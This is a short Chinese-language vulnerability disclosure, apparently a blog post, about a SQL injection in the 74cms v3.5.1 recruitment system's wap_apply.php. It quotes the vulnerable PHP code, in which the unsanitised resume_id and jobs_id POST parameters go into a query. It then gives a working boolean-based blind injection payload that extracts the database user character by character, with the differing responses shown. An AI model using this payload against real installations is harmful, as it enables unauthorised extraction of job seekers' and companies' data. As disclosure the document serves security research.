74cms SQL注入漏洞

骑士PHP人才系统:74cms_v3.5.1_20141020.zip
之前出的 最新版本
漏洞文件:\wap\personal\wap_apply.php
[php]
elseif ($act == 'apply_add')
{
$_POST=array_map("utf8_to_gbk", $_POST);
$sql="select * from ".table("personal_jobs_apply")." where resume_id=$_POST[resume_id] and jobs_id=$_POST[jobs_id]";
$row=$db->getone($sql);

if($_SESSION['utype']!=2){
exit("个人会员请登录后申请职位");
}
elseif($row){
exit("您已经申请过此职位!");
}
else{
$setsqlarr["jobs_id"]=$_POST["jobs_id"];
$setsqlarr["jobs_name"]=$_POST["jobs_name"];
$setsqlarr["company_id"]=$_POST["company_id"];
$setsqlarr["company_name"]=$_POST["company_name"];
$setsqlarr["company_uid"]=$_POST["company_uid"];
$setsqlarr["resume_id"]=$_POST["resume_id"];
$setsqlarr["resume_name"]=$_POST["resume_title"];
$setsqlarr["personal_uid"]=$_SESSION["uid"];
$setsqlarr["apply_addtime"]=time();
inserttable(table('personal_jobs_apply'),$setsqlarr)?exit("ok"):exit("err");
}
}
[/php]
resume_id 和jobs_id 2个参数都没进行'保护 遂造成注入
先注册个用户

http://127.0.0.1/74cms/upload/wap/personal/wap_apply.php?act=apply_add

post:resume_id=1&jobs_id=23 and if(ascii(substr(user(),1,1))=113,1,null)%23
74

post:resume_id=1&jobs_id=23 and if(ascii(substr(user(),1,1))=114,1,null)%23

742

发表评论